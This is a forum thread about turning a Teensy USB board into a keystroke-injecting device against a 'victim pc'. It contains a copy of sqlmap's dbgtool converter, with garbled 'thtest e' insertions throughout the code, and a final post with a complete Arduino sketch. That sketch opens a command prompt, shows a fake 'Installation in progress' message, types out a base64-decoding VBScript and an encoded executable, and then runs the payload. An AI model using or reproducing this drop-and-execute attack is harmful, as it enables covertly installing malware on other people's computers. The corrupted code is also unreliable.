Jump to content

[Version 1] Some Of My Ideas And Workings


Sud0x3
 Share

Recommended Posts

I bought a teensy a few weeks back and here are some of my thoughts and ideas, im going to try not to ramble on.

IDEA 1: Build an executable on the victim pc

Here i basically wanted to try and find a way to create, make or build! an executable from instructions sent from the device. The only way of doing this that i could think of was using the windows debug trick.

So using a module from http://sqlmap.sourceforge.net/ i converted an executable into a format that windows debug can read and convert this text file into an executable again. So i had the lines of code, i needed to get them onto the pc i decided id use the teensy to write each line from the file into a new notepad doc on the victims pc and then save and do the conversion on the file.

dbgtool.py - Portabltest e executabltest e to ASCII debug script converter

Copyright © 2006-2010 sqlmap developers

source

#!/usr/bin/env python

"""
$Id$

dbgtool.py - Portabltest e executabltest e to ASCII debug script converter

Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
Setest e thtest e filtest e 'doc/COPYING' for copying permission
"""

import os
import sys
import struct

from optparstest e import OptionError
from optparstest e import OptionParser

def convert(inputFile):
    fileStat = os.stat(inputFile)
    fileSiztest e = fileStat.st_size

    if fileSiztest e > 65280:
        print "ERROR: thtest e provided input filtest e '%s' is too big for debug.exe" % inputFile
        sys.exit(1)

    script     = "n %s\nr cx\n" % os.path.basename(inputFile.replace(".", "_"))
    script    += "%x\nf 0100 ffff 00\n" % fileSize
    scrString  = ""
    counter    = 256
    counter2   = 0

    fp          = open(inputFile, "rb")
    fileContent = fp.read()

    for fileChar in fileContent:
        unsignedFileChar = struct.unpack("B", fileChar)[0]

        if unsignedFileChar != 0:
            counter2 += 1

            if not scrString:
                scrString  = "test e %0x %02x" % (counter, unsignedFileChar)
            else:
                scrString += " %02x" % unsignedFileChar
        elif scrString:
            script   += "%s\n" % scrString
            scrString = ""
            counter2  = 0

        counter += 1

        if counter2 == 20:
            script    += "%s\n" % scrString
            scrString  = ""
            counter2   = 0

    script += "w\nq\n"

    return script

def main(inputFile, outputFile):
    if not os.path.isfile(inputFile):
        print "ERROR: thtest e provided input filtest e '%s' is not a regular file" % inputFile
        sys.exit(1)

    script = convert(inputFile)

    if outputFile:
        fpOut      = open(outputFile, "w")
        sys.stdout = fpOut
        sys.stdout.write(script)
        sys.stdout.close()
    else:
        print script

if __name__ == "__main__":
    usagtest e = "%s -i <input file> [-o <output file>]" % sys.argv[0]
    parser  = OptionParser(usage=usage, version="0.1")

    try:
        parser.add_option("-i", dest="inputFile", help="Input binary file")

        parser.add_option("-o", dest="outputFile", help="Output debug.extest e text file")

        (args, _) = parser.parse_args()

        if not args.inputFile:
            parser.error("Missing thtest e input file, -h for help")

    except (OptionError, TypeError), e:
        parser.error(e)

    inputFiltest e  = args.inputFile
    outputFiltest e = args.outputFile

    main(inputFile, outputFile)

I tried using the Keyboard.print command, Keyboard.print("n WirelessKeyView_exe");

with help put together a script that would put the strings of a file and embed them between a Keyboard.print string.

#!/usr/bin/python

for line in open('debug.txt', 'r').readlines():
    open('output.txt', 'a').write('Keyboard.print("' + line.replace('\n', '') + '");\n')

r cx
bc00
f 0100 ffff 00
e 100 4d 5a 90
e 104 03
e 108 04
e 10c ff ff
e 110 b8
e 118 40
e 13c e0
e 140 0e 1f ba 0e
e 145 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61
e 159 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44
e 16d 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24
e 180 12 f2 d9 dc 56 93 b7 8f 56 93 b7 8f 56 93 b7 8f ac b0 f7 8f

Keyboard.print("r cx");
Keyboard.print("bc00");
Keyboard.print("f 0100 ffff 00");
Keyboard.print("e 100 4d 5a 90");
Keyboard.print("e 104 03");
Keyboard.print("e 108 04");
Keyboard.print("e 10c ff ff");
Keyboard.print("e 110 b8");
Keyboard.print("e 118 40");
Keyboard.print("e 13c e0");
Keyboard.print("e 140 0e 1f ba 0e");
Keyboard.print("e 145 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61");
Keyboard.print("e 159 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44");

after getting this far i tried to compile the project and it seems to be too many lines of code for the teensy to handle on the software, il be honest i dont have a clue.

here is the error i got in compiling

elf section .data is not within region data

elf section .bss will not fit in region data

elf section .data is not within region data

./desktop/arduino-0018/hardware/tools/avr/bin/../lib/gcc/avr/4.3.2/../../../../avr/bin/ld.exe: region data overflowed by 43740 bytes

IDEA 2: Some ideas for scripts

Off my head not all may be viable or sane!

+ enter bios, run through key combinations to put the PC into the bios configurstion

+ Bypass Screensaver, again run through key combinations to bypass the screensaver

+ enumeration, script to do enumeration through the command line using only the pcs programs. teensy would generate a batch file though the same methods discussed above when i converted a file to a readable format for the teensy to use.

+ Payload switcher on an lcd screen

+ more to come...

Edited by Sud0x3
Link to comment
Share on other sites

I've been doing the same thing

http://www.toolcrypt.org/tools/dbgtool/index.html using this instead of the python script

ive been running into the same kind of issues, the code compiles ok but i dont htink the teensy's memmory can handle that much text at ones, trying to figure out a loop for it to take chunks of the debug script at a time

Link to comment
Share on other sites

  • 1 month later...

I think I might have found the solution to help with getting an executable on the box using Teensy and nothing but the HID drivers of the OS. When I was researching around I found a VBScript for server side conversion of a file to base64. I then changed it around a bit and have adapted it to my Teensy. Right now, I have posed a tutorial on how to convert any file to ASCII Base64 encoded text then decode it using nothing but VBScripts. I am currently in the process of writing the tutorial on adapting this logic to the Teensy.

But to get you started, here is the tutorial on how to convert any file to ASCII base64 encoding: http://dabermania.blogspot.com/2011/03/converting-any-file-to-ascii-for.html

Link to comment
Share on other sites

  • 1 month later...

Hi all,

I was working on the same topic, so I can share my Poc.

I used the same encoding technique that you are talking about (base64 in vbs) and writing the payload and the vbs on the victim machine.

Here is the code, works fine for me with an asm downloader of 1Ko (env. 3 sec. to execute the loop):

#include <phukdlib.h>
#include <avr/pgmspace.h>
//
// binary copy download and execute payload
//
// 25.05.2011


char vbsString[] = "echo Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0):outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = CreateObject(\"Scripting.FileSystemObject\"):set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function decodeBase64(base64):dim DM, EL:Set DM = CreateObject(\"Microsoft.XMLDOM\"):Set EL = DM.createElement(\"tmp\"):EL.DataType = \"bin.base64\":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub writeBytes(file, bytes):Dim binaryStream:Set binaryStream = CreateObject(\"ADODB.Stream\"):binaryStream.Type = 1:binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub > script.vbs & cls" ;

#include <avr/pgmspace.h>

// put the encoded exe payload here
prog_char string_0[] PROGMEM =  "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > pl.dat & cls";
prog_char string_1[] PROGMEM =  "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_2[] PROGMEM =  "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_3[] PROGMEM =  "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_4[] PROGMEM =  "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_5[] PROGMEM =  "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_6[] PROGMEM =  "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5m >> pl.dat & cls";
prog_char string_7[] PROGMEM =  "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_8[] PROGMEM =  "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_9[] PROGMEM =  "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls"; 
prog_char string_10[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_11[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_12[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_13[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_14[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_15[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_16[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_17[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_18[] PROGMEM = "echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> pl.dat & cls";
prog_char string_19[] PROGMEM = "echo AA== >> pl.dat";


// Then set up a table to refer to your strings.

PROGMEM const char *string_table[] = 	
{   
  string_0,
  string_1,
  string_2,
  string_3,
  string_4,
  string_5,
  string_6,
  string_7,
  string_8,
  string_9,
  string_10,
  string_11,
  string_12,
  string_13,
  string_14,
  string_15,
  string_16,
  string_17,
  string_18,
  string_19};

char buffer[100];   


void setup() {
  delay(20000);
  pinMode(11, OUTPUT);
  digitalWrite(11, HIGH);
  delay(50);
  sendWinKey () ;
  delay(500);
  Keyboard.println("cmd"); //"cmd /t:ab"
  //delay(500);
  //ShrinkCurWinMSWIN();
  delay(500);
  Keyboard.print("msg ");
  sendAsterixKey ();
  Keyboard.println(Installation in progress... - Please Wait ");
  delay(50);
  sendVbs();
}

void loop()			  
{
  }

void sendVbs () {
  Keyboard.println(vbsString);

  for (int i = 0; i < 20; i++)
  {
    strcpy_P(buffer, (char*)pgm_read_word(&(string_table[i])));
    Keyboard.println(buffer); 
    delay(50);
  }

  Keyboard.println("cscript script.vbs pl.dat payload.exe & cls");
  Keyboard.println("payload.exe & cls"); // run payload
  Keyboard.println("exit"); // run payload
}

void sendPlusKey () {
  Keyboard.set_key1(KEYPAD_PLUS);
  Keyboard.send_now();
  Keyboard.set_key1(0); // reset key state
  Keyboard.send_now();
}

void sendAsterixKey () {
  Keyboard.set_key1(KEYPAD_ASTERIX);
  Keyboard.send_now();
  Keyboard.set_key1(0); // reset key state
  Keyboard.send_now();
}

void sendWinKey () {
  Keyboard.set_modifier(128); 
  Keyboard.set_key1(KEY_R);
  Keyboard.send_now(); 
  Keyboard.set_modifier(0); 
  Keyboard.set_key1(0); 
  Keyboard.send_now(); 
}

Any ideas are welcome.

Cheers.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...